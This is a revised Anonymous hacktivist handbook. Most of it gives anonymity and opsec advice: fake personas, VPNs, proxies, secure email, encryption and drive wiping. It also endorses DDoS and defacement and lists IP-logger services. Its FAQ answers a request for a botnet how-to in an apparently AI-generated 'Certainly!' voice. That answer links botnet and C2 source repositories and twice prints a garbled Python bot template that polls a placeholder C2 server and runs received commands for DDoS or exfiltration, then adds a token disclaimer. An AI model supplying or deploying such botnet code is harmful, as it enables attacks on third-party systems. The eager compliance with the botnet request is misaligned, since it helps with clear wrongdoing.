Anonymous — The Uber-Secret Handbook
Version 3.0
Version 2.0 2011
Revised Date 05/16/2024
ANONYMOUS
Preface: We are Anonymous
The greatest threats to your safety are:
1. Social engineering and your behavior – see Social Threats.
2. Revealing your IP address – see Technical.
Try to follow as many of these suggestions as possible to ensure maximum privacy and safety!
Social Threats
Basic rule: Blend in with the crowd, disperse into the stream. Keep a low profile. Don’t try to be special. Remember, when in Rome, do as Romans do. Don’t feed your ego. Alphabet kids are many, Anonymous is Legion, but you are only one.
Heroes only exist in comic books keep that in mind! There are no old heroes; there are only young heroes and dead heroes.
Do not give any personal information on social media your mom could read what you write there and so could the Police.
Don’t mention your involvement with Anonymous in your real life.
DO NOT:
- Include personal information in your handle.
- Discuss personal information, your address or where you’re from. In fact mislead people, use a language generator, change your name, where you live, your family, job etc. Keep them guessing.
- Mention your gender, tattoos, scars, piercings, body modifications, your weight or your physical and / or psychological capacities (got the idea?).
- Mention your profession or hobbies or involvement in other activist groups.
- Mention whether you’re in a relationship.
- Musical tastes / preferred literature / films are good ways to know someone, don’t mention any of those.
- Use special characters, which are existent only in your language, as they would reveal where you are from.
- Give even bogus info. Lot’s of no’s, make a yes.
- Shit, create a whole new person with a new name, banking information, employment, etc.
Fake name generator– https://www.fakenamegenerator.com/gen-random-br-pt.php
WARNING: It’s designed specifically to not click away from the screen to enter data or
you will have to enter it again because it will generate a new identity every time you click
away. In other words DO NOT CLICK AWAY Else Fail.
- Blend anything from your real life with Anon, don’t talk about Anonymous in real life except posting posters anonymously, etc.
- Mention congresses that you have been at, schools or universities, etc.
- Mention your time zone, this can reveal where you live.
- Connect at the same time regularly. Try to alternate.
- Post on the public net where you are.
- Stagger your login & log out times on Facebook, Twitter, TikTok, Instagram, Blue sky or
any communication channels.
*rss generators are good to learn to stagger your posts on social media
-
- Circleboom– https://circleboom.com
- Generate, Automate and Schedule with AI Social Media Manager. All accounts in
one place!
- Generate, Automate and Schedule with AI Social Media Manager. All accounts in
- DLVR– https://dlvrit.com
- automates social media postings for you
- Fetch– https://fetchrss.com
- this bot will scan the page and automatically detect all the news, posts, and
articles.
- this bot will scan the page and automatically detect all the news, posts, and
- Circleboom– https://circleboom.com
Or you could specify which exact content you’d like to have in your feed.
*Anons DO NOT DOXX Anons
Ddos or stage attacks locally, we are in this together, help your brothers and sisters and they will help you around the world
*Post pictures hosted on META. The filename contains your profile ID.
Technical
Basic Rule: Use as many security layers as possible which will all be covered in detail below with recommendations. The question is not whether you are paranoid, but whether you are paranoid enough?
A good start is to use a VPN and run Anonymous related Software from a USB device. A proxy will also do, but it is not as secure as a VPN.
Anti Censorship Guide will give you the best tools to keep you Anonymous. The Anti Censorship Guide can be found on this site under resources.
Always use as many security layers as possible. Make sure to use them in the right way. If you don’t know how to use them, learn first.
*Knowledge is Free and a key aspect of being apart of the collective
Most Anonymous’ use VPN to hide their traces. They use SSL encrypted connections and #vhost when they are on the interwebz.
Portable Software
Portable software is software you can run from an USB drive, so that it leaves almost no traces on your computer.
http://portableapps.com is the world’s most popular portable software solution allowing you to take your favorite software with you. A fully open source and free platform, it works from any synced cloud folder (DropBox, Google Drive, Box, etc), from your local PC.
http://portableapps.com/apps/internet/firefox_portable
When you become apart of the Anonymous collective start by creating a nickname, aka, “handle”, using a fake email address. Disposable emails are, also, listed further below.
The following, however, are trusted secure email providers:
Top Secure Email Providers
- ProtonMail. ProtonMail is the most well-known secure email provider.
- Mailbox.org. Mailbox.org is a secure email service aimed at business users looking for an alternative to Google or Microsoft tools.
- HubSpot. Whenever HubSpot transmits or stores your personal data, HubSpot encrypts your data while exchanging it with your computer and uses top security measures to prevent unauthorized or unintended access to their network. Not only are your emails secure, but HubSpot also protects your entire suite of tools, whether you’re using their emails, CMS, website builders, and more.
- Zoho Mail. It encrypts your emails in transit and on the Zoho servers using a type of asymmetric cryptography called S/MIME. A digital signature unique to each user ensures that the email isn’t spoofed.
- Tuta (personal favorite). Tuta is another open source secure email provider with end-to-end encryption and two-factor authentication. Tuta is very serious about privacy. Instead of PGP, it uses AES and RSA encryption. These systems use the same algorithms as PGP, but they add an extra layer of security by combining symmetric and asymmetric keys. Other security features are image blocking, header stripping, and warnings about phishing attacks. The free plan is only for private use and gives you 1 GB of storage and a single calendar.
- Posteo. https://posteo.de/en Is popular with activists and journalists who need to remain anonymous, as it allows you to register and pay anonymously. Posteo encrypts your data in transit and at rest. Although Posteo doesn’t use end-to-end encryption by default, you can choose to enable it. Support for POP and IMAP allows you to use Posteo in an email client like Outlook. If you’re switching from another email provider, Posteo’s migration service makes it painless by migrating your archived emails, folder structure, contact list, and calendar. According to Posteo, its servers and offices run entirely on green energy from Greenpeace Energy.
- Thexyz. Thexyz is a lesser-known secure email provider. It doesn’t have built-in end-to-end encryption, but you can use OpenPGP end-to-end encryption with a browser add-on called Mailvelope. Your email is also protected with spam filters and firewalls. Thexyz is Canadian, with a lot of its servers located in the U.S. — not the best if you’re looking for privacy from government agencies.
- PrivateMail. https://privatemail.com offers end-to-end OpenPGP encryption and other security features like self-destructing emails. PrivateMail sets itself apart from other secure email services in its cloud storage. thanks to AES 256 encryption. When you download your files, you can decrypt them locally or leave them encrypted. PrivateMail also provides secure file sharing with end-to-end encryption. The downside to PrivateMail is that it’s based in the U.S. It’s also more expensive than most of the other options.
- Startmail. StartMail is a secure email service managed by the same people who operate the private search engine Startpage, Startmail uses PGP encryption and can work with other PGP clients. You can send encrypted messages to non-PGP users if they know the answer to a secret question. While Startmail doesn’t have a free plan, it does offer a 30-day free trial.
- CounterMail. CounterMail is serious about security. Like many of the providers on this list, CounterMail uses PGP encryption. It also enhances that encryption with AES and RSA algorithms. You can further protect your data by configuring a USB key for two-factor authentication. CounterMail’s Sweden-based servers are unique in that they don’t have hard drives and instead start from a CD-ROM for extra security. Safebox is CounterMail’s password manager. All of the usernames and passwords in the Safebox are protected with one master password, which can’t be retrieved if you forget it. You can get a ten-day free trial if you already know someone who uses CounterMail.
Join and follow # to keep track of Anonymous activity you are interested in but they are changing often due to censorship but you can find a lot simply by utilizing hashtags.
Many Operations are relayed between different servers as well as social media platforms we prefer Signal https://signal.org for safe communication
Signal is State-of-the-art end-to-end encryption (powered by the opensource Signal Protocol)
If using social media to communicate keep discussions light in public chat rooms your safety matters, use code words such as a fruit to let someone know to go private.
Discord (very dangerous for activists and hacktivists) we DO NOT RECOMMEND in any capacity.
Telegram has its advantages but it is not safe and by default, the chats on the app are not end-to-end encrypted.
VPN
When thinking of a VPN service, think first about the legislation of the country. A USA VPN might provide user data upon warrant issue. In other countries such as Sweden and Iceland, this is unlikely to happen. They have a strong privacy policy, which makes it harder for law enforcement agencies to get access. In addition, some servers do not keep logs of users. Also try to get VPN services that accept anonymous payments (For those that keep user billing information).
More info: https://en.m.wikipedia.org/wiki/Virtual_private_network
Free VPNs — Not recommended:
If they aren’t selling you a service they are selling you.
The best free VPNs in 2024 are:
- PrivadoVPN: https://privadovpn.com
- Proton: https://protonvpn.com
- Windscribe: https://windscribe.com
- Hide.me: https://hide.me/en/free-vpn
- Hotspot Shield: https://www.hotspotshield.com/amp/free-vpn/
Commercial VPN providers:
- NordVPN: https://nordvpn.com
- TunnelBear: https://www.tunnelbear.com
- TorGuard VPN: https://torguard.net
- Surfshark: https://surfshark.com
- CyberGhost: https://www.cyberghostvpn.com/en_US/
- Mullvad VPN: https://mullvad.net/en
- IPVanish: https://www.ipvanish.com
- IVPN: https://www.ivpn.net
Proxies:
You may use them in conjunction with a VPN.
Free:
- CyberGhost Proxy Romania, Holland, Germany, U.S. https://www.cyberghostvpn.com/
- Hide.me Holland, Germany, Finland https://hide.me/en
- PlainProxies N/A https://hide.me/en/?friend=cloudwards
- CroxyProxy US, UK, Spain, Germany, Israel, Canada https://www.croxyproxy.com
- VPNBook US, UK, Canada https://www.vpnbook.com
- Steganos Proxy US, Germany, France, Spain https://www.steganos.com/en/easter-2024-steganos-vpn-online-shield
- ProxySite US, Canada,France, Belgium https://www.proxysite.com
- Whoer Holland https://whoer.net
- Proxyium Poland, US, Singapore, Germany https://proxyium.com
- FilterBypass N/A https://www.filterbypass.me
Logs IPs
Tools or software used to track and record the IP addresses of individuals visiting a particular website or accessing specific content online. An IP address is a unique numerical identifier assigned to each device connected to the internet
- https://iplogger.org
- https://www.solarwinds.com/ip-address-manager/use-cases/ip-address-tracker
- https://www.opentracker.net/feature/ip-tracker
- https://grabify.link
- https://bitly.com
- http://ps3cfw.com
Nicknames aka Handles:
Make sure to pick a good handle, what defines good? Fuck if we know just don’t be an astroturf turd.
For Anonymous related activities it means: don’t use a nickname that you already use in general or public online spots. This way you ensure that you won’t be tracked down by a common username you use on your gamer profiles or other websites where you might have put real life related info.
General Browsing Safety:
Basic Rule: Always browse in ” ‘Private Mode” but know that:
- Private Browsing does not mask your identity or activity online
- If you download a file from a website, it will remain on your computer, but it will not appear in the download manage
- Private Browsing will, by default, still displays visited and bookmarks as you type in the address bar
- Private Browsing does not protect you from malware installed on your computer such as key loggers and spyware
So let’s make your Anonymity and private life a priority by offering the best private browsing software:
- Avast– https://www.avast.com
- Brave– https://brave.com
- DuckDuckGo an oldie but very reliable https://duckduckgo.com
- Epic Browser, like Avast and Opera, Epic Privacy Browser includes built-in VPN-like functionality with its encrypted proxy https://epicbrowser.com.
- Firefox- free and open-source alternative to other browsers and non corporate https://www.mozilla.org/en-US/firefox
- Hardened Firefox-Based Privacy using https://ffprofile.com/ or arkenfox/user.js/ template “user.js“
- Ghostery https://www.ghostery.com
- Librewolf Don’t let its interface fool you it is a custom version of Firefox and worth using https://librewolf.net
- Mullvad The browser was created in collaboration between the Mullvad VPN service and the Torproject. Annoying push towards upgrading but highly recommended https://mullvad.net
- Opera reliable and Norwegian for privacy and safety https://www.opera.com
- Tempest Browser Newer but offers randomized finger printing for browsing safety which is not common as it should be https://tempest.com/browser
- Tor https://www.torproject.org
- Waterfox– https://www.waterfox.ne
* Using a free VPN will ensure your privacy in most situations online.
* If possible, use USB drives. You can nuke them if needed and if leaves no traces on your hard drive
* Recycle your online accounts as needed. A virtual name is just that, something people use torefer to you in given situations.
* When creating accounts, use VPN (see above) or TOR bundle that will give a bogus origin as well.
* Tip: Use a different VPN for each of your online personas. When checking real email accounts, social media, use a different VPN than from the one you use for Anonymous activities.
Useful (mandatory) plugins /extensions for Firefox:
Pop up Blocker:
NoScript (blocks Javascript)
https://addons.mozilla.org/en-US/firefox/addon/noscript
AdBlock Plus (blocks Ads)
Element Blocker for Adblock Plus
https://addons.mozilla.org/en-US/firefox/addon/element-blocker
Ghostery (tracking pixels)
https://addons.mozilla.org/en-US/firefox/addon/ghostery
TACO (More adblocking)
https://addons.mozilla.org/en-US/firefox/addon/trump-taco
Refcontrol
ttps://addons.mozilla.org/en-US/firefox/addon/referercontrol
Flagfox
https://addons.mozilla.org/en-US/firefox/addon/flagfox
User Agent Switcher Sends bogus browser identity to servers.
https://addons.mozilla.org/en-US/firefox/addon/uaswitcher
https everywhere
https://www.eff.org/deeplinks/2021/09/https-actually-everywhere
Scroogle SSL search
Search Engines:
- Brave and Duck Duck Go are still this authors personal favorites
Download TOR:
Make sure your cached data is securely destroyed before re-starting firefox
1. On desktop, use the Ctrl+Shift+Del(Windows) or Command+Shift+Delete (Mac) keyboard shortcut.
2. On mobile, head to Clear private data (Android) or Data Management (iOS).
3. Once there, select Cache only and then tap or click OK
For more information:
https://support.mozilla.org/en-US/kb/how-clear-firefox-cache
System Safety
Basic rule: Security is a continuing process, not a state. Do audits on a regular and scheduled basis. And do encrypted backups. Backups important, as there are two types of people, those who have backups and those who have lost their data.
Cloud Backup:
- IDrive https://www.idrive.com
- BackBlaze https://www.backblaze.com/cloud-backup/personal-v1
- Acronis https://www.acronis.com/en-us/
- SpiderOak One https://crossclave.com/one/
- Carbonite https://www.carbonite.com
Use the operating system you are familiar with Linux, Ubuntu and Unix but we will give a variety for your needs:
- Linux https://www.linux.org (authors recommendations https://blackarch.org)
- Ubuntu https://ubuntu.com
- UNIX https://publications.opengroup.org/guides/unix (not cheap and not open source or for noobs)
- Windows 10 https://www.microsoft.com/en-us/software-download/windows10ISO
- Android 11 https://www.android.com/android-11
- MacOS Big Sur https://www.easeus.com/computer-instruction/macos-big-sur-download.html
- Debian https://www.debian.org
- Fedora Workstation https://fedoraproject.org/workstation/download
- Raspberry Pi https://www.raspberrypi.com
- Parrot OS https://gitlab.com/parrotsec
- iOS 14 https://www.apple.com/newsroom/2020/09/ios-14-is-available-today
-
- Uninstall everything you not need.
- Disable all remote tools.
- Shred or encrypt /temp, /var/temp and all world-readable files.
- Use Linux for activism purposes and a virtual box, hands down our favorite
- Oracle VM Virtual Box Free for Windows, Mac and Linux https://www.virtualbox.org
Best for apple users:
- Parallels https://www.parallels.com/products/desktop/?irclickid=xoL373xStxyKRXRU1cy8%3AWNvUkHQebxpRQF1Xo0&utm_source=impact&utm_medium=affiliate&utm_campaign=PL-other-all-defaultaffiliatelink&irgwc=1
- VMware Fusion Pro for Mac https://blogs.vmware.com/teamfusion/2024/05/fusion-pro-now-available-free-for-personal-use.html
Open Source VM
- Xen Project https://xenproject.org
- Encryption Software basic moderate and advanced users
- DiskCryptor Basic open-source disk encryption on Windows https://diskcryptor.org
- FileVault Basic built-in disk encryption on macOS https://support.apple.com/en-ph/guide/deployment/dep82064ec40/web
- Cryptomator Moderate encryption of cloud storage https://cryptomator.org
- BestCrypt Advanced for Windows, Mac, Linux, Android & cloud storage encryption beyond forensic recovery https://www.jetico.com/data-encryption/encrypt-files-bestcrypt-container-encryption
*Never ever keep logs.
* Shutdown all unneeded services.
Basic rule: Security is a continuing process, not a state. Do audits on a regular and scheduled basis. And do encrypted backups. Backups important, as there are two types of people, those who have backups and those who have lost their data.
- Parallels https://www.parallels.com/products/desktop/?irclickid=xoL373xStxyKRXRU1cy8%3AWNvUkHQebxpRQF1Xo0&utm_source=impact&utm_medium=affiliate&utm_campaign=PL-other-all-defaultaffiliatelink&irgwc=1
- VMware Fusion Pro for Mac https://blogs.vmware.com/teamfusion/2024/05/fusion-pro-now-available-free-for-personal-use.html
Open Source VM
- Xen Project https://xenproject.org
Encryption Software – basic moderate and advanced users
- DiskCryptor Basic open-source disk encryption on Windows https://diskcryptor.org
- FileVault Basic built-in disk encryption on macOS https://support.apple.com/en-ph/guide/deployment/dep82064ec40/web
- Cryptomator Moderate encryption of cloud storage https://cryptomator.org
- BestCrypt Advanced for Windows, Mac, Linux, Android & cloud storage encryption beyond forensic recovery https://www.jetico.com/data-encryption/encrypt-files-bestcrypt-container-encryption
*Never ever keep logs.
*Shutdown all unneeded services.
Use a firewall
- Nordlayer https://nordlayer.com
- Barracuda CloudGen https://www.barracuda.com
- Check Point Quantum https://www.checkpoint.com/quantum/
- ForcePoint NextGen https://www.forcepoint.com
- Juniper SRX https://www.juniper.net
If you detect any unwanted activity INSIDE your computer and they got through your firewalls
Here are some ways to check:
- Press Ctrl+Alt+Del, click Task Manager, and review current processes.
- Look for blatant signs of active intrusion.
- Inspect all recent activity on the device.
- Check for remote access programs.
- Review firewall settings.
- Run an antivirus scan
*On a Mac, open the Activity Monitor by pressing Command + Space. Alternatively, select the magnifying glass icon and search for Activity Monitor.
Hackers with remote access to your device may change your firewall settings to give themselves backdoor access to your device.
To review your firewall settings on a Windows device:
- Press the Windows key + X, then select Control Panel.
- Navigate to System and Security > Windows Defender Firewall > Advanced Settings.
- Examine Inbound Rules and Outbound Rules to see if there are any activities or connections that you don’t recognize.
- Right-click on any rule that you think is suspicious, and select Disable Rule. This precaution will block the connection temporarily. Before permanently disabling any rule, research to verify if it is legitimate.
To review your firewall settings on a Mac device:
- Click on the Apple menu, then System Preferences.
- Select Security & Privacy, then open the Firewall tab.
- If the firewall is not enabled, select the padlock icon (on the bottom left corner).
- You can enable the firewall by entering your administrator credentials.
- Select Firewall Options to view the full list of rules and applications.
- Examine this list for any suspicious activities or connections. If you find a questionable rule, uncheck the box next to the application to block the connection.
If your device has an unknown remote admin take these steps:
- Immediately disconnect from the internet unplug the Ethernet cable or turn off your Wi-Fi
connection. Without an internet connection, a hacker can’t use your computer. However, as some malware can still run offline, the best approach is a total computer shutdown. - Update all passwords using a secure device The compromised device may have spyware or keyloggers that can record your new passwords. It’s safer to change your passwords with another device, like your smartphone or a friend’s computer. Create new passwords for all of your online account.
- Use antivirus software- You can limit the damage caused by malware by reviewing your installed programs and removing any software that you don’t recognize or trust. On Windows, you can access your installed programs through the Control Panel. On Macs, you can review all installed programs via the Applications folder.
- Back up and wipe your device, this step removes any hidden malware and restores your device to its original settings. Before you perform a factory reset on your device, copy all files and settings to the cloud or an external hard drive.
- Secure your WiFi router to stop hackers from gaining access to the rest of your family’s devices, encrypt your home network.
- Here’s how to secure your Wi-Fi router.
- Change the default login credentials — remember to use long, complex, and unique passwords.
- Disable the remote administration settings to prevent unauthorized access.
- Enable WPA3 encryption — if your router doesn’t support WPA3 encryption, choose WPA2.
- Update your router’s firmware to the latest version.
*If you think your router might have been hacked, contact your ISP at once, reset it, and/or reinstall its firmware or buy a new one.
For phones.
If you suspect unauthorized activity on your device, here are some steps you can take:
- Review Device Activity: If you’re using a Google account, you can check recent device activity.
- Sign in to your Google Account, go to the Device Activity (https://myaccount.google.com/intro/device-activity) page, and review the list devices that have accessed your account in the last 28 days
- (https://bing.com/search?q=detect+activity+inside+device). This can help you identify any unusual
or unexpected activity - Monitor Data Usage: Keep an eye on your data usage. If you notice a sudden spike in data
consumption without changes in your online habits, it could be a sign of unauthorized activity
(https://bing.com/search?q=detect+activity+inside+device) - (https://pixelprivacy.com/resources/spying-on-your-cell-phone/). Check your data usage settings
on your device to track any anomalies. - Check Running Apps:
-
- On Android devices, you can see which apps are currently running. Go to your device’s settings, find the “Apps” or “Applications” section, and review the list of active apps. If you see any unfamiliar or suspicious apps, consider uninstalling them.
-
- Permissions Audit: Regularly review app permissions. Some apps may request excessive permissions
that they don’t actually need. If you find an app with unnecessary permissions, revoke them. - Security Software: Install reputable security software or antivirus apps on your device. These tools can help detect and prevent malicious activity.
- Remember to stay vigilant and take action promptly if you suspect any unusual behavior on your device!
- Public access points are perfect – just about. (Correlating logins with CCTV could prove disastrous so security cameras should be avoided while using such ‘free’ services. Cybercafes, McDonald’s, and many companies offer free internet access, remember though, not to surf those nets without a VPN and/or Tor.
*Keep private keys (pgp gnupgp) in a removable, and that removable device away from curious eyes. Private keys can be stored in protected format on a disk, which means they can only be used on that specific computer. Another option is to have a key on a smart card that can be used on a different computer if it has a smart card reader and supporting software
*Keep VPN certs away from curious eyes via removable device, or common hidden folders.
*Never use the same users/passwords on reinstall. Take the time to create a new one each time.
*Use random password generators:
Avast- https://www.avast.com/en-us/random-password-generator#ios
1password– https://1password.com/password-generator
Norton– https://my.norton.com/extspa/passwordmanager?path=pwd-gen
Delinea–https://delinea.com/resources/password-generator-it-tool
BitWarden– https://bitwarden.com/password-generator
*BE paranoid. All rare activity in your computer must be checked and monitored. That will provide 2
things: knowledge once you identify it, and added safety.
Destroy data securely in Unix/Linux:
https://www.bleachbit.org/download/linux
If you feel the need to wipe the whole hard drive
- First, unmount the drive using the “sudo” unmount command, which allows you to specify the drive letter and partition number.
- Then use a sudo dd if= of= [Options] command to overwrite the specified drive or partition. The dd command makes several passes over the hard drive, overwriting the data with zeros to make it difficult or impossible to recover. This process can take some time and may need to run overnight
Linux Shred Tool.
This tool will also overwrite data on a drive with random characters. The process is initiated with a command:
- sudo shred [option] <target>
and is directed to a specific drive location. This process can also be a long one, so plan to let this run until it fully completes.
Linux Scrub Command.
This command is not available in most Linux distributions by default and may need to be installed. Like the others, it can be used to delete all files in a directory of Linux or to wipe entire drives. It overwrites data using patterns rather than random characters.
Once installed on the system, it is called with this command:
- sudo scrub [option] <target>
Linux Wipe Command.
The syntax used is:
- sudo wipe [options] <target>
Or For instance, Blancco Drive Eraser can securely wipe data from all common operating systems, including Windows, macOS, and Linux. Blancco LUN Eraser can also run on a terminal and erase data on a machine without shutting it down.
Destroy data securely on Mac:
https://support.apple.com/en-ph/guide/mac-help/mchl7676b710/mac
Destroy data securely in Windows:
Here’s how to erase a hard drive on Windows 11:
- Go to Settings and select System from the left panel. Select Recovery from the System menu.
- In the Recovery menu, find Reset this PC under Recovery options. Click the Reset PC button on the right side.
- Next, you’ll be asked what you want to erase. Select Remove everything, and then choose whether you’d like to perform a Local reinstall or a Cloud downloadto reinstall Windows.
- In the next window, select Yes under Clean data? and (if you plan to keep your computer) under Download Windows? Click Confirm and Reset to wipe your PC’s hard drive.
Wiping a hard drive on Windows 10 is like doing it on Windows 11. There are just a few small differences.
Here’s how to clear a hard drive on Windows 10:
- Open the Settings menu and click Update & Security.
- Select Recovery in the left menu, then click Get Started under Reset this PC.
- Click Remove everything and select whether you’d like to perform a Local reinstall or a Cloud download to reinstall Windows on your wiped device.
- Click Next to confirm your preferences. Once you’re sure you’ve backed up anything you may need, and you’re ready to wipe your hard drive, click Reset.
i2P – Anonymizing Network
What is I2P?
I2P is an anonymizing network, offering a simple layer that identity-sensitive applications can use to securely communicate.
All data is wrapped with several layers of encryption, and the network is both distributed and dynamic, with no trusted parties.
Enjoy your anonymity and privacy!
There’s a version for
Windows, MacOs, Linux, Debian, Ubuntu, Android,
https://geti2p.net/en/download
Anonymous surfing with I2P
To enable I2P to anonymize in Internet Explorer:
- Search for Network and Internet Settings in the start menu
- Click Proxy Settings
- Check the box for use a proxy server for your LAN
- Check the box for Bypass proxy server for local addresses
- Click Advanced to open the ports window
- Enter the values: IP 127.0.0.1 and port 4444 for HTTP, and port 4445 for HTTPS
- Click OK to save the settings
Troubleshooting
https://geti2p.net/en/faq
FAQ (in no particular order)
Q: Can you help us?
A: We are everywhere and we are everyone and do our best to get behind causes we believe in and are brought to our attention. We do not do anything for personal gain but for the greater good of others. Our goal is to help yes on a global and local level. Think globally and act locally
Q: Do you guys have a website?
A: There is no official website
Q: How do I know what’s hot?
A: It’s not about what’s hot or cold it’s about standing behind causes that are dear to the collectives spirit
Q: Are the Ops on popular Anonymous sites official?
A: There are no official accounts, or official spokesperson for the collective. We are an idea with no head and whether an Operation gains traction depends on the will of the collective. Anyone can start an Op and there is a guide on starting an Operation. Some succeed, some fail and some have mixed results. Most are like seeds, planting trees for shade we may never see in our lifetime. Anonymous is not a fad but a way of life
Q: Why not hack debts, mortgages and school loans
A: Paper trail is too long
Q: What are DDoS and defacements good for anyway? It doesn’t help the people.
A: DDoS is all about steering media’s attention towards the problems of the people. If media takes notice, this will help the people. The fine art of defacing a website is about sending a message to the people and the owner of that website. Besides that, Anonymous provides the people with information and guides and software to circumvent censorship, also known as the Anti Censorship Care Package
Q: What’s in the Care Package?
A: Software like Tor Onion Router, a Circumventing Censorship Manual, more software, other guides and useful information for people to be the media
Q: Can you give me a How-To about building botnets?
A: Certainly! Here are some open-source botnet projects available on GitHub:
- Joker Mirai V1
- Developed by IoTNet, this powerful botnet includes basic attack methods for homes, servers, L7, and bypasses
- [Joker Mirai V1 Source](https://github.com/USBBios/Joker-Mirai-Botnet-Source-V1)
- Nebula C2
- Python-based botnet command-and-control (C&C) server.[Nebula C2 Source] https://github.com/NixWasHere/NebulaC2)
- Reaper
- An ADB-based botnet written in Reaper Source https://github.com/0x1CA3/Reaper)
- Krypton C2
- A simple botnet source with DDoS capabilities [Krypton C2 Source](https://github.com/CirqueiraDev/KryptonC2)
- Anywhere
- A powerful botnet allowing remote control of compromised device [Anywhere Source](https://github.com/thisisnzed/Anywhere)
- BOTECSA
- botnet connected to Telegram [BOTECS Source] (https://github.com/esfelurm/BOTECS) Simplified botnet code template bot.py import requests import time
- C2_SERVER http://your-c2-server.com
- def main():
while True:
try:
response = requests.get(f”{C2_SERVER}/commands”) command = response.text.strip()
if command: execute_command(command)
time.sleep(60) # Poll every minute
except Exception as e:
print(f”Error: {e}”)
def execute_command(command):
# Implement logic to execute commands (e.g., DDoS, data exfiltration, etc.) print(f”Received command: {command}”)
if name == ” main “:
main()
- Krypton script
- Krypton C2 bot malware script (bot.py)
- import requests
- import time
- C2_SERVER “http://your-c2-server.com“
def main():
while True:
try:
response = requests.get(f”{C2_SERVER}/commands”) command = response.text.strip()
if command:
execute_command(command)
time.sleep(60) # Poll every minute except
Exception as e:
print(f”Error: {e}”)
def execute_command(command):
# Implement logic to execute commands (e.g., DDoS, data exfiltration, etc.)
print(f”Receivedcommand: {command}”)
if name == ” main “:
main()
Remember that these projects are for educational purposes only, and using them for malicious activities is both unethical and illegal. Always follow legal guidelines and use your knowledge responsibly.
Q: I have seen some strange download links in channels and on social media can I trust them?
A: Anonymous recommends to not trust links and we use a variety of sources to check links:
- Virus Total https://www.virustotal.com/gui/home/upload
- EasyDMarc https://easydmarc.com/tools/phishing-url
- Sucuri https://sitecheck.sucuri.net
Q: Someone asked me where I live and what my name is.
A: Do NOT provide personal information
Q: How can I join your club?
A: Anonymous is not a club, anyone can be Anonymous but not everyone is Anonymous
Q: But how does that Anonymous’ thing function anyways?
A: Best way to find out is, to join a channel, lurk around and get an impression of it. Anons oppose Internet censorship and control. The majority of our actions target governments, organizations, and corporations that are oppressive of basic human rights.
Q: I am not a hacker, how can I help you?
A: If you:
- can collect/ spread information
- can organize things
- can make contacts
- can provide insights
- can share experiences
- can push the IMMA FIRING MA LAZOR button
- can write guides
- can do artwork
- can speak a foreign language and/ can translate… you can be helpful.
Q: I am a Media-Guy, how can I contact you?
A: Anonymous discourages media interviews unless we put out a press release which can be in the form of writings or videos. There is no official spokesperson
Q: I am a Media-Women, how can I contact you?
A: See above answer
Some useful Links
Disposable and Throw-away-emails
Use them for registering activism activities such as petitions, writing officials, trolling accounts, etc.
https://www.disposablemail.com
Portable Software
Portable software is software, that you can run from an USB drive, so that it leaves nearly no traces on your computer.
Sending anonymous email
Free and uncensored DNS-Servers
OpenDNS– https://www.opendns.com
Uncensored DNS– https://blog.uncensoreddns.org
Cloudflare DNS– https://www.cloudflare.com/application-services/products/dns
For Android– https://www.cloudflare.com/application-services/products/dns/
Warp– https://one.one.one.one
Quad9 DNS– https://quad9.net
Why DNS? Domain Name System (DNS) Security protects the privacy and security of your internet browsing. It is a protocol that translates human-readable website names into machine-readable IP addresses. DNS security is an important part of information security, and it can be used to protect your data from cyber threats.
We will stand up wherever there is bigotry
We will stand up wherever there is discrimination
We will stand up wherever there are injustice and inequality
We will stand up wherever there are oppression, segregation and crisis
We are everywhere We are Anonymous
Anonymous.
This is the 2024 revised version
— The Uber-Secret Handbook from 2011